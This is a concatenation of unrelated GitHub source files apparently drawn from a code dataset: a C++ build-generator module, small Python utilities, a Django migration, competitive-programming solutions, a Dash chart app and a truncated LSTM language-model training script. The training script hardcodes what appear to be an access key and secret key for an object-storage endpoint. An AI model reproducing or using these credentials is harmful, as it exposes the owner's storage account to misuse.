value))\n return dictVariantSettings\n\n\n\n\n\n def __TryGenerateRunCommandForExecutable(self, buildContext: LocalBuildContext,\n package: Package,\n userVariantSettingDict: Dict[str, str],\n runCommands: Optional[List[str]]) -> Optional[List[str]]:\n if package.Type != PackageType.Executable or runCommands is None or len(runCommands) <= 0:\n return None\n if package.ResolvedBuildPath is None or package.AbsolutePath is None:\n raise Exception(\"Invalid package\")\n\n if package not in buildContext.GeneratorReportDict:\n raise Exception(\"ForAllExe not supported by generator for package: {0}\".format(package.Name))\n\n generatorReport = buildContext.GeneratorReportDict[package]\n variableReport = generatorReport.VariableReport\n executableReport = generatorReport.ExecutableReport\n if executableReport is None:\n raise Exception(\"ForAllExe not supported by generator for package {0} as it didnt contain a executable record\".format(package.Name))\n\n foundVariantExePath = ReportVariableFormatter.Format(executableReport.ExeFormatString,\n variableReport, userVariantSettingDict,\n executableReport.EnvironmentVariableResolveMethod)\n packagePath = package.AbsolutePath\n fullPathExe = IOUtil.Join(packagePath, foundVariantExePath)\n exeName = IOUtil.GetFileName(foundVariantExePath)\n exePath = IOUtil.GetDirectoryName(fullPathExe)\n contentPath = IOUtil.Join(packagePath, \"Content\")\n fullBuildDirPath = IOUtil.Join(packagePath, 
package.ResolvedBuildPath)\n fullBuildDirPath = buildContext.Config.ToCurrentOSPathDirectConversion(fullBuildDirPath)\n fullPathExe = buildContext.Config.ToCurrentOSPathDirectConversion(fullPathExe)\n exeName = buildContext.Config.ToCurrentOSPathDirectConversion(exeName)\n exePath = buildContext.Config.ToCurrentOSPathDirectConversion(exePath)\n packagePath = buildContext.Config.ToCurrentOSPathDirectConversion(packagePath)\n contentPath = buildContext.Config.ToCurrentOSPathDirectConversion(contentPath)\n\n commands = []\n if executableReport.RunScript is not None:\n runScript = executableReport.RunScript\n if not executableReport.UseAsRelative:\n runScript = IOUtil.Join(packagePath, runScript)\n\n commands.append(runScript)\n\n for commandToRun in runCommands:\n command = commandToRun\n command = command.replace(\"(EXE)\", fullPathExe)\n command = command.replace(\"(EXE_NAME)\", exeName)\n command = command.replace(\"(EXE_PATH)\", exePath)\n command = command.replace(\"(PACKAGE_NAME)\", package.Name)\n command = command.replace(\"(PACKAGE_PATH)\", packagePath)\n command = command.replace(\"(CONTENT_PATH)\", contentPath)\n command = command.replace(\"(BUILD_PATH)\", fullBuildDirPath)\n commands.append(command)\n return commands\n\n\n\ndef __BuildCompleteVariantDict(topLevelPackage: Package) -> Dict[str, PackagePlatformVariant]:\n variantDict = dict(topLevelPackage.ResolvedAllVariantDict) # type: Dict[str, PackagePlatformVariant]\n return variantDict\n\n\ndef __ValidateUserVariantSettings(config: Config,\n topLevelPackage: Package,\n userVariantSettingDict: Dict[str, str]) -> None:\n variantDict = __BuildCompleteVariantDict(topLevelPackage)\n for key, value in list(userVariantSettingDict.items()):\n if key in variantDict:\n variant = variantDict[key]\n if not value in variant.OptionDict:\n validValues = list(variant.OptionDict.keys())\n validValues.sort()\n raise Exception(\"Variant '{0}' expects one of the following values: '{1}' not '{2}'\".format(key, ','.join(validValues), value))\n elif key != ToolAddedVariant.CONFIG:\n config.LogPrint(\"WARNING: Unused variant setting '{0}'\".format(key))\n\n\ndef __LogVariantSettings(config: Config, variantSettingsDict: Dict[str, str]) -> None:\n if len(variantSettingsDict) <= 0:\n return\n names = list(variantSettingsDict.keys())\n names.sort()\n result = []\n for name in names:\n result.append(\"{0}={1}\".format(name, variantSettingsDict[name]))\n config.LogPrint(\"Variant settings: {0}\".format(\", \".join(result)))\n\n\n# generator = the generator that was used to build the files\ndef BuildPackages(generatorContext: GeneratorContext,\n config: Config,\n packages: List[Package],\n variantSettingsDict: Dict[str, str],\n buildArgs: List[str],\n buildForAllExe: Optional[str],\n generator: GeneratorPluginBase2,\n enableContentBuilder: bool,\n forceClaimInstallArea: bool,\n buildThreads: int,\n buildCommand: int) -> None:\n PlatformUtil.CheckBuildPlatform(generatorContext.PlatformName)\n topLevelPackage = PackageListUtil.GetTopLevelPackage(packages)\n\n __ValidateUserVariantSettings(config, topLevelPackage, variantSettingsDict)\n __LogVariantSettings(config, variantSettingsDict)\n\n buildConfig = BuildConfigRecord(generatorContext.PlatformName, variantSettingsDict, buildCommand, buildArgs, buildForAllExe, generator, buildThreads)\n Builder(generatorContext, config, topLevelPackage, buildConfig, enableContentBuilder, forceClaimInstallArea)\n\n\n# requestedFiles is None for SDK builds else its the list of specifically requested files by the user\ndef 
ShowVariantList(log: Log,\n topLevelPackage: Package,\n requestedFiles: Optional[List[str]],\n generator: GeneratorPluginBase2) -> None:\n\n variantDict = __BuildCompleteVariantDict(topLevelPackage)\n\n\n # This is kind of a hack to list this here (its also not a real variant inside our model)\n generatorVariants = generator.GetVariants()\n if len(variantDict) <= 0 and len(generatorVariants) <= 0:\n log.DoPrint(\"Variants: None\")\n return\n\n # Pretty print useful information\n log.DoPrint(\"Variants:\")\n\n generatorVariants.sort(key=lambda s: s.Name.lower())\n for variantInfo in generatorVariants:\n if variantInfo.Type == BuildVariantType.Static:\n log.DoPrint(\" {0}={1} (Introduced by native build system generator)\".format(variantInfo.Name, variantInfo.Description))\n else:\n log.DoPrint(\" {0}={1} (Introduced by native build system)\".format(variantInfo.Name, variantInfo.Description))\n\n variantNames = list(variantDict.keys())\n variantNames.sort()\n for variantName in variantNames:\n variant = variantDict[variantName]\n optionNames = list(variant.OptionDict.keys())\n optionNames.sort()\n if variant.Type == VariantType.Virtual:\n log.DoPrint(\" {0}={1} *Virtual* (Introduced by package: {2})\".format(variant.PurifiedName, ', '.join(optionNames), variant.IntroducedByPackageName))\n else:\n log.DoPrint((\" {0}={1} (Introduced by package: {2})\".format(variant.PurifiedName, ', '.join(optionNames), variant.IntroducedByPackageName)))\n\n\ndef ShowBuildVariantList(log: Log, generator: GeneratorPluginBase2) -> None:\n # This is kind of a hack to list this here (its also not a real variant inside our model)\n generatorVariants = [variant for variant in generator.GetVariants() if variant.Type == BuildVariantType.Static]\n\n if len(generatorVariants) <= 0:\n log.DoPrint(\"Build variants: None\")\n return\n log.DoPrint(\"Build variants:\")\n\n generatorVariants.sort(key=lambda s: s.Name.lower())\n\n for variantInfo in generatorVariants:\n log.DoPrint(\" {0}={1} (Introduced by native build system generator)\".format(variantInfo.Name, variantInfo.Description))\n\n\ndef __PrintRequirementsNode(log: Log,\n node: RequirementTreeNode,\n currentIndent: str,\n strAddIndent: str) -> None:\n if node.Content is None:\n raise Exception(\"Invalid node\")\n strFormat = \"{0}-\"\n if node.Content.Type == PackageRequirementTypeString.Feature:\n strFormat += \" '{2}'\"\n else:\n strFormat += \" {1}: '{2}'\"\n if len(node.Content.Version) > 0:\n strFormat += \" V{3}\"\n #if len(node.Content.Extends) > 0:\n # strFormat += \" extends '{4}'\"\n strFormat += \" (introduced by package: {5})\"\n log.DoPrint(strFormat.format(currentIndent, node.Content.Type, node.Content.Name, node.Content.Version, node.Content.Extends, \", \".join(node.Content.IntroducedByPackages)))\n\n # Group by type\n dictGroup = {} # type: Dict[str, List[RequirementTreeNode]]\n for childNode in node.Children:\n if childNode.Content is None:\n raise Exception(\"Invalid node\")\n if childNode.Content.Type in dictGroup:\n dictGroup[childNode.Content.Type].append(childNode)\n else:\n dictGroup[childNode.Content.Type] = [childNode]\n\n # Pretty print useful information in name sorted order\n sortedGroupIds = list(dictGroup.keys())\n # sort by type name, but make sure that new 'features' go last\n sortedGroupIds.sort(key=lambda s: s if s != PackageRequirementTypeString.Feature else '{{feature}}')\n\n for groupId in sortedGroupIds:\n groupedRequirements = dictGroup[groupId]\n groupedRequirements.sort(key=lambda s: None if s.Content is None else 
s.Content.Id)\n for childNode in groupedRequirements:\n __PrintRequirementsNode(log, childNode, currentIndent + strAddIndent, strAddIndent)\n\n\n# requestedFiles is None for SDK builds else its the list of specifically requested files by the user\ndef ShowRequirementList(log: Log,\n basicConfig: BasicConfig,\n topLevelPackage: Package,\n requestedFiles: Optional[List[str]],\n showFeaturesOnly: bool = False) -> None:\n message = \"Requirements\" if not showFeaturesOnly else \"Features\"\n filterName = None if not showFeaturesOnly else PackageRequirementTypeString.Feature\n requestedPackages = PackageUtil.GetPackageListFromFilenames(topLevelPackage, requestedFiles)\n requirements = RequirementFilter.GetRequirementList(topLevelPackage, requestedPackages, filterName)\n\n if len(requirements) <= 0:\n log.DoPrint(\"{0}: None\".format(message))\n return\n log.DoPrint(\"{0}:\".format(message))\n\n rootNode = RequirementTree(requirements).RootNode\n\n strAddIndent = \" \"\n # We only show the type group info when there is more than one\n #showTypeGroup = len(rootNode.Children) > 1\n baseIndent = \"\" #strAddIndent if len(rootNode.Children) > 1 else \"\"\n\n sortedFeatures = list(rootNode.Children)\n sortedFeatures.sort(key=lambda s: None if s.Content is None else s.Content.Id)\n for sortedFeature in sortedFeatures:\n __PrintRequirementsNode(log, sortedFeature, baseIndent, strAddIndent)\n\n\n# requestedFiles is None for SDK builds else its the list of specifically requested files by the user\ndef ShowFeatureList(log: Log,\n basicConfig: Config,\n topLevelPackage: Package,\n requestedFiles: Optional[List[str]]) -> None:\n ShowRequirementList(log, basicConfig, topLevelPackage, requestedFiles, True)\n\n\n# requestedFiles is None for SDK builds else its the list of specifically requested files by the user\ndef ShowExtensionList(log: Log,\n topLevelPackage: Package,\n requestedFiles: Optional[List[str]]) -> None:\n requestedPackages = PackageUtil.GetPackageListFromFilenames(topLevelPackage, requestedFiles)\n requirements = RequirementFilter.GetRequirementList(topLevelPackage, requestedPackages, PackageRequirementTypeString.Extension)\n\n if len(requirements) <= 0:\n log.DoPrint(\"Extensions: None\")\n return\n log.DoPrint(\"Extensions:\")\n\n # Pretty print useful information in name sorted order\n requirements.sort(key=lambda s: s.Id)\n\n currentIndent = \" \"\n\n for requirement in requirements:\n strFormat = \"{0}- '{1}'\"\n if len(requirement.Version) > 0:\n strFormat += \" V{2}\"\n if len(requirement.Extends) > 0:\n strFormat += \" extends '{3}'\"\n strFormat += \" (introduced by package: {4})\"\n log.DoPrint(strFormat.format(currentIndent, requirement.Name, requirement.Version, requirement.Extends, \", \".join(requirement.IntroducedByPackages)))\n","repo_name":"alejandrolozano2/OpenGL_DemoFramework","sub_path":".Config/FslBuildGen/Build/Builder.py","file_name":"Builder.py","file_ext":"py","file_size_in_byte":28986,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"36149770084","text":"# coding=utf-8\nfrom typing import List, Iterator\nimport torch\nfrom torchdata.datapipes import functional_datapipe\nfrom torchdata.datapipes.iter import IterDataPipe\n\n\ndef get_ids_greater_than(probs: torch.Tensor, threshold: float = 0.5) -> List[torch.Tensor]:\n \"\"\"\n Get idx of the last dimension in probability arrays, which is greater than the threshold\n \"\"\"\n if probs.dim() < 2:\n probs = probs.unsqueeze(0)\n probs_bool = probs.gt(threshold)\n 
ids_row, ids_col = torch.nonzero(probs_bool, as_tuple=True)\n \n result = []\n shape = probs.size()\n for i in range(shape[0]):\n result.append(torch.masked_select(ids_col, ids_row == i))\n \n return result\n\ndef get_span(start_ids, end_ids):\n \"\"\"\n copy from paddlenlp\n Get span set from position start and end list.\n \"\"\"\n start_pointer = 0\n end_pointer = 0\n len_start = len(start_ids)\n len_end = len(end_ids)\n couple_dict = {}\n while start_pointer < len_start and end_pointer < len_end:\n start_id = start_ids[start_pointer]\n end_id = end_ids[end_pointer]\n\n if start_id == end_id:\n couple_dict[end_ids[end_pointer]] = start_ids[start_pointer]\n start_pointer += 1\n end_pointer += 1\n continue\n if start_id < end_id:\n couple_dict[end_ids[end_pointer]] = start_ids[start_pointer]\n start_pointer += 1\n continue\n if start_id > end_id:\n end_pointer += 1\n continue\n result = [(couple_dict[end], end) for end in couple_dict]\n result = set(result)\n return result\n\n@functional_datapipe(\"set_length\")\nclass LengthSetterIterDataPipe(IterDataPipe):\n r\"\"\"\n Set the length attribute of the DataPipe\n \"\"\"\n\n def __init__(self, source_datapipe: IterDataPipe, length: int) -> None:\n self.source_datapipe: IterDataPipe = source_datapipe\n assert length >= 0\n self.length: int = length\n\n def __iter__(self) -> Iterator:\n yield from self.source_datapipe\n\n def __len__(self) -> int:\n return self.length","repo_name":"rongruosong/uie-lightning","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30117251407","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nfrom ...core.objects.hero import DMHero\nfrom ...core.objects.monster import DMMonster\nfrom ...core.objects.relic import DMRelic\nfrom utilities import UnlockPack\n\nif TYPE_CHECKING:\n from dm.core.contexts import AttackContext\n from dm.core.game.game import DMGame\n################################################################################\n\n__all__ = (\"PhoenixClaw\",)\n\n################################################################################\nclass PhoenixClaw(DMRelic):\n\n def __init__(self, state: DMGame):\n\n super().__init__(\n state,\n _id=\"REL-223\",\n name=\"Phoenix's Claw\",\n description=(\n \"Every time a monster attacks an enemy in Burn state, 2 \"\n \"Acceleration is acquired at a 20 % chance.\"\n ),\n rank=3,\n unlock=UnlockPack.Original\n )\n\n################################################################################\n def handle(self, ctx: AttackContext) -> None:\n \"\"\"Automatically called as part of all battle loops.\"\"\"\n\n # If the attacker is a monster and the defender is a hero...\n if isinstance(ctx.source, DMMonster):\n if isinstance(ctx.target, DMHero):\n # Check if the defender is in Burn state.\n burn = ctx.target.get_status(\"Burn\")\n if burn is not None:\n # If so, roll a 20 % chance to add 2 Acceleration.\n if self.random.chance(20):\n ctx.source.add_status(\"Acceleration\", 2, self)\n\n################################################################################\n","repo_name":"AllegroVivo/DungeonDefense","sub_path":"dm/relics/ThreeStar/PhoenixClaw.py","file_name":"PhoenixClaw.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74949345040","text":"# -*- coding: utf-8 -*-\nfrom __future__ 
import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contenttypes', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Customer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ],\n options={\n 'verbose_name': 'cliente',\n 'verbose_name_plural': 'clientes',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='DeliveryMethod',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('code', models.CharField(verbose_name='código', max_length=50, unique=True)),\n ('name', models.CharField(verbose_name='nombre', max_length=150)),\n ],\n options={\n 'verbose_name': 'método de envío',\n 'verbose_name_plural': 'métodos de envío',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Person',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('first_name', models.CharField(verbose_name='nombre', max_length=100)),\n ('last_name', models.CharField(verbose_name='apellido', max_length=100)),\n ('email', models.EmailField(verbose_name='e-mail', max_length=75)),\n ('address', models.TextField(verbose_name='dirección', blank=True)),\n ('phone', models.CharField(verbose_name='teléfono', blank=True, max_length=100)),\n ('object_id', models.PositiveIntegerField()),\n ('content_type', models.ForeignKey(to='contenttypes.ContentType')),\n ],\n options={\n 'verbose_name': 'persona',\n 'verbose_name_plural': 'personas',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='customer',\n name='delivery_method',\n field=models.ForeignKey(verbose_name='método de envio', to='delicontacts.DeliveryMethod'),\n preserve_default=True,\n ),\n ]\n","repo_name":"jualvarez/deliverest","sub_path":"delicontacts/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18323339231","text":"import sys\nimport math\nfrom collections import defaultdict\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef main():\n N = NI()\n A = NLI()\n now = 0\n ans = 0\n for a in A:\n if now <= a:\n now = a\n else:\n ans += now - a\n print(ans)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Mao-beta/AtCoder","sub_path":"ABC/ABC176/ABC176C.py","file_name":"ABC176C.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37110331427","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.express as px\nimport seaborn as sns\nimport pandas as pd\n\n\n\ndef get_fig(df):\n return px.scatter(df, x=\"Lokasyon_Sayisi\", y=\"Cihaz_Sayisi\",\n size=\"Data-Download(GB)\", color='Lokasyon_Kategorisi',\n log_x=True, size_max=60,\n title='Ana Lokasyon Kategorilerinin Alt Bölge Sayısı ve Bağlı Toplam Cihaz Sayısına Göre Download Edilen Data (GB) Miktarı'\n )\n\n\nibb = pd.read_csv('ibb_wifi.csv') # Dataset -> 
https://data.ibb.gov.tr/dataset/ibbwifi-lokasyon-kategorisine-gore-veri-kullanimi/resource/c80cc8b2-3791-4070-865a-f61296a4cac0\n\nDF = ibb.copy()\n\napp = dash.Dash()\n\nlokasyon_dropdown = dcc.Dropdown(\n id='lokasyon-dropdown',\n options=[\n {'label': f'{lokasyon}', 'value': lokasyon} for lokasyon in DF['Lokasyon_Kategorisi'].unique()\n ],\n searchable=True,\n placeholder='Lokasyon Kategorisi Seçebilirsiniz...',\n)\n\nLAYOUT = html.Div(children=[\n html.H1('Callback Çalışması', style={\n 'textAlign': 'center',\n 'color': 'red',\n }),\n html.Div(children=[\n lokasyon_dropdown,\n dcc.Graph(\n id='scatter-chart',\n figure=get_fig(DF)\n )\n ]),\n])\n\napp.layout = LAYOUT\n\n\n@app.callback(\n dash.dependencies.Output('scatter-chart', 'figure'),\n [dash.dependencies.Input('lokasyon-dropdown', 'value')]\n)\ndef lokasyon_filtrele(value):\n if value:\n return get_fig(DF.query(f'Lokasyon_Kategorisi == \"{value}\"'))\n else:\n return get_fig(DF)\n\n\nif __name__ == '__main__':\n app.run_server()\n","repo_name":"mebaysan/VeriBilimi","sub_path":"Python/3-)KesifciVeriAnaliziVeVeriGorsellestirme/Plotly-Dash-Examples/intro_callback_ibb.py","file_name":"intro_callback_ibb.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"tr","doc_type":"code","stars":20,"dataset":"github-code","pt":"3"} +{"seq_id":"33990673867","text":"# Это библиотечный пример тестирования стандартных функций для строки\nimport unittest\nfrom fib import fibonacci\n\n# Создается класс. классу соответсвует набор тестовых сценариев (TestCase)(тесируемые кейсы)\nclass TestStringMethods(unittest.TestCase): \n\n def test_simple_fibonacci(self):\n for param, result in [(0, 0), (1, 1), (2, 1), (5, 5)]:\n self.assertEqual(fibonacci(param), result) \n \n def test_stress_fibonacci(self):\n self.assertEqual(fibonacci(9999), fibonacci(9998) + fibonacci(9997)) \n with self.assertRaises(ValueError):\n fibonacci(10000)\n \n def test_negative_fibonacci(self):\n with self.assertRaises(ValueError):\n fibonacci(-1)\n with self.assertRaises(ValueError):\n fibonacci(-100)\n \n def test_wrong_types_fibonacci(self):\n with self.assertRaises(TypeError):\n fibonacci('Hello')\n with self.assertRaises(TypeError):\n fibonacci(3.14) \n \n\n# Тест-кейс 1 (Стандратный пример)\n# def test_upper(self): # Важно что функции начинаются с \"test_\"\n# self.assertEqual('foo'.upper(), 'FOO') # Функция assertEqual предназначена для сравнения двух вещей(равны или не равны)\n\n# def foo(): # Для примера такая функция не вызовется из-за отсутсвия test_\n# pass\n\n# # Тест-кейс 2\n# def test_isupper(self):\n# self.assertTrue('FOO'.isupper()) # Проверяется на правду \n# self.assertFalse('Foo'.isupper()) # Проверяется на не правду\n\n# # Если бы использовался стандартный метод assert - то было бы жесткое падение программы.\n\n# # Тест-кейс 3 \n# def test_split(self):\n# s = 'hello world'\n# self.assertEqual(s.split(), ['hello', 'world'])\n# # check that s.split fails when the separator is not a string\n# with self.assertRaises(TypeError): # Будет вызвано исключение методом assertRaises\n# s.split(2)\n \n\nif __name__ == '__main__':\n unittest.main() # Запускается main из библиотеки unittest","repo_name":"mangustik228/lessons","sub_path":"python/khyrianov/les_14/test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25123223294","text":"def oke(n):\n if n < 3:\n print(-1)\n return\n elif n % 3 == 0:\n print('5'*n)\n return\n 
elif n == 5:\n print('3'*n)\n else:\n flag = False\n for j in range(int(n/3),-1,-1):\n if (n - (3*j))%5 ==0:\n flag = True\n print(\"{}{}\".format('5'*(3*j),'3'*(n - (3*j))))\n break\n if not flag:\n print(-1)\n return\n\nif __name__ == \"__main__\":\n for i in range(int(input())):\n n = int(input())\n oke(n)","repo_name":"hatienl0i261299/HackerRank.com-Code-by-python-ver-3","sub_path":"Sherlock and The Beast.py","file_name":"Sherlock and The Beast.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"42858743065","text":"# read the Diabetes.txt data\nfileHanl = open(\"Diabetes.txt\", \"r\")\ndestFileHanl = open(\"Diabetes.csv\", \"w\")\ndestFileHanl.write(\"g.area,i.area,SSPG,weight,fp.glucose,class\\n\")\nwhile True:\n line = fileHanl.readline()\n if not line:\n break\n vals = line.split(' ')\n finalVals = []\n colsSeen = 0\n for val in vals: \n if val != \"\":\n if colsSeen >= 3:\n finalVals.append(val.strip().replace('\\n',''))\n colsSeen += 1\n \n for i in range(1, len((finalVals))):\n if i == len(finalVals)-1:\n destFileHanl.write(finalVals[i]+\"\\n\")\n else:\n destFileHanl.write(finalVals[i]+\",\")\n\nfileHanl.close()\ndestFileHanl.close()","repo_name":"jeetendragan/statistical-data-mining-ub","sub_path":"HW_3/HW-Final/P2/dataParser.py","file_name":"dataParser.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31459442972","text":"import argparse\nimport time\nimport math\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom collections import defaultdict\n\nfrom scipy import signal as signal\nimport data\nimport model_chrono as model\nimport copy\n\nfrom pathlib import Path\nimport sys\npath = Path(__file__).parent.absolute()\nsys.path.append(str(path)+'/cottoncandy')\n\n\nimport os\nos.environ[\"LD_PRELOAD\"]='/home/shivangi/anaconda3/lib/libstdc++.so.6.0.25' \nimport matplotlib.pyplot as plt\n\nfrom utils import batchify, get_batch, repackage_hidden\n\nimport cottoncandy as cc\naccess_key = 'SSE14CR7P0AEZLPC7X0R'\nsecret_key = 'K0MmeXiXotrGIiTeRwEKizkkhR4qFV8tr8cIXprI'\nendpoint_url = 'http://c3-dtn02.corral.tacc.utexas.edu:9002/'\ncci = cc.get_interface('lstm-timescales', ACCESS_KEY=access_key, SECRET_KEY=secret_key,endpoint_url=endpoint_url)\n\nparser = argparse.ArgumentParser(description='PyTorch PennTreeBank RNN/LSTM Language Model')\nparser.add_argument('--data', type=str, default='data/penn/',\n help='location of the data corpus')\nparser.add_argument('--model', type=str, default='LSTM',\n help='type of recurrent net (LSTM, QRNN, GRU)')\nparser.add_argument('--emsize', type=int, default=400,\n help='size of word embeddings')\nparser.add_argument('--nhid', type=int, default=1150,\n help='number of hidden units per layer')\nparser.add_argument('--nlayers', type=int, default=3,\n help='number of layers')\nparser.add_argument('--lr', type=float, default=30,\n help='initial learning rate')\nparser.add_argument('--clip', type=float, default=0.25,\n help='gradient clipping')\nparser.add_argument('--epochs', type=int, default=8000,\n help='upper epoch limit')\nparser.add_argument('--batch_size', type=int, default=80, metavar='N',\n help='batch size')\nparser.add_argument('--bptt', type=int, default=70,\n help='sequence length')\nparser.add_argument('--dropout', type=float, default=0.4,\n help='dropout applied to layers (0 = no dropout)')\nparser.add_argument('--dropouth', 
type=float, default=0.3,\n help='dropout for rnn layers (0 = no dropout)')\nparser.add_argument('--dropouti', type=float, default=0.65,\n help='dropout for input embedding layers (0 = no dropout)')\nparser.add_argument('--dropoute', type=float, default=0.1,\n help='dropout to remove words from embedding layer (0 = no dropout)')\nparser.add_argument('--wdrop', type=float, default=0.5,\n help='amount of weight dropout to apply to the RNN hidden to hidden matrix')\nparser.add_argument('--seed', type=int, default=1111,\n help='random seed')\nparser.add_argument('--nonmono', type=int, default=5,\n help='random seed')\nparser.add_argument('--cuda', action='store_false',\n help='use CUDA')\nparser.add_argument('--log-interval', type=int, default=200, metavar='N',\n help='report interval')\nrandomhash = ''.join(str(time.time()).split('.'))\nparser.add_argument('--save', type=str, default=randomhash+'.pt',\n help='path to save the final model')\nparser.add_argument('--alpha', type=float, default=2,\n help='alpha L2 regularization on RNN activation (alpha = 0 means no regularization)')\nparser.add_argument('--beta', type=float, default=1,\n help='beta slowness regularization applied on RNN activiation (beta = 0 means no regularization)')\nparser.add_argument('--wdecay', type=float, default=1.2e-6,\n help='weight decay applied to all weights')\nparser.add_argument('--resume', type=str, default='',\n help='path of model to resume')\nparser.add_argument('--optimizer', type=str, default='sgd',\n help='optimizer to use (sgd, adam)')\nparser.add_argument('--when', nargs=\"+\", type=int, default=[-1],\n help='When (which epochs) to divide the learning rate by 10 - accepts multiple')\n\n##added by shivi\nparser.add_argument('--Tmax', type=int, default=20)\nparser.add_argument('--Tmin', type=int, default=1)\n\nargs = parser.parse_args()\nargs.tied = True\n\n# Set the random seed manually for reproducibility.\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nif torch.cuda.is_available():\n if not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n else:\n torch.cuda.manual_seed(args.seed)\n\n###############################################################################\n# Load data\n###############################################################################\n\ndef model_save(fn):\n #with open(fn, 'wb') as f:\n # torch.save([model, criterion, optimizer], f)\n cci.upload_pickle('shivangi/'+fn, [model, criterion, optimizer])\n\ndef model_copy_save(fn):\n #with open(fn, 'wb') as f:\n # torch.save([model_copy, criterion, optimizer], f)\n cci.upload_pickle('shivangi/'+fn, [model_copy, criterion, optimizer])\n\ndef model_load(fn):\n global model, criterion, optimizer\n try:\n with open(fn, 'rb') as f:\n model, criterion, optimizer = torch.load(f)\n except:\n print('Downloading from pickle')\n model, criterion, optimizer = cci.download_pickle('shivangi/'+fn)\n\nimport os\nimport hashlib\nfn = 'corpus.{}.data'.format(hashlib.md5(args.data.encode()).hexdigest())\nif os.path.exists(fn):\n print('Loading cached dataset...')\n corpus = torch.load(fn)\nelse:\n print('Producing dataset...')\n corpus = data.Corpus(args.data)\n torch.save(corpus, fn)\n\n####Save word2idx dictionary \nif False:\n word2idx_dict_name = 'shivangi/'+'word2dict_'+ args.data\n word2idx_dict = corpus.dictionary.word2idx\n cci.upload_npy_array(word2idx_dict_name,list(word2idx_dict))\n\n \n #cross_check\n word2dict_penn = cci.download_npy_array(word2idx_dict_name)\n h = {word2dict_penn[i]:i for 
i in range(len(word2dict_penn))}\n for word in h:\n if word2idx_dict[word] != h[word]:\n print('Worng index')\n\n print(word2idx_dict)\n\n\n####### \n#1. \nvocab_dict = corpus.dictionary.counter\n#print(sorted(vocab_dict.keys(),key=vocab_dict.get,reverse=True))\n#print(vocab_dict)\ntotal_count = sum(vocab_dict.values())\ncount=0\nhigh_freq=set()\nprint( total_count/2)\nfor key in vocab_dict.keys():\n if count < total_count/2:\n count+=vocab_dict[key]\n high_freq.add(key)\n\n####### \neval_batch_size = 10\ntest_batch_size = 1\ntrain_data = batchify(corpus.train, args.batch_size, args)\nval_data = batchify(corpus.valid, eval_batch_size, args)\ntest_data = batchify(corpus.test, test_batch_size, args)\n\n###############################################################################\n# Build the model\n###############################################################################\n\nfrom splitcross import SplitCrossEntropyLoss\ncriterion = None\n\nntokens = len(corpus.dictionary)\nUNK_ind = corpus.dictionary.word2idx['<unk>']\nTmax = args.Tmax; Tmin= args.Tmin\nmodel_copy = model.RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.dropouth, args.dropouti, args.dropoute, args.wdrop, args.tied, args.Tmax, args.Tmin)\nfor l in range(args.nlayers):\n model_copy.rnns[l]._setweights()\nmodel = model.RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.dropouth, args.dropouti, args.dropoute, args.wdrop, args.tied, args.Tmax, args.Tmin)\n\n###\nif args.resume:\n print('Resuming model ...')\n model_load(args.resume)\n optimizer.param_groups[0]['lr'] = args.lr\n model.dropouti, model.dropouth, model.dropout, args.dropoute = args.dropouti, args.dropouth, args.dropout, args.dropoute\n if args.wdrop:\n from weight_drop import WeightDrop\n for rnn in model.rnns:\n if type(rnn) == WeightDrop: rnn.dropout = args.wdrop\n elif rnn.zoneout > 0: rnn.zoneout = args.wdrop\n###\nif not criterion:\n splits = []\n if ntokens > 500000:\n # One Billion\n # This produces fairly even matrix mults for the buckets:\n # 0: 11723136, 1: 10854630, 2: 11270961, 3: 11219422\n splits = [4200, 35000, 180000]\n elif ntokens > 75000:\n # WikiText-103\n splits = [2800, 20000, 76000]\n print('Using', splits)\n criterion = SplitCrossEntropyLoss(args.emsize, splits=splits, verbose=False)\n###\nif args.cuda:\n model.cuda()\n model_copy.cuda()\n criterion.cuda()\n###\nparams = list(model.parameters()) + list(criterion.parameters())\ntotal_params = sum(x.size()[0] * x.size()[1] if len(x.size()) > 1 else x.size()[0] for x in params if 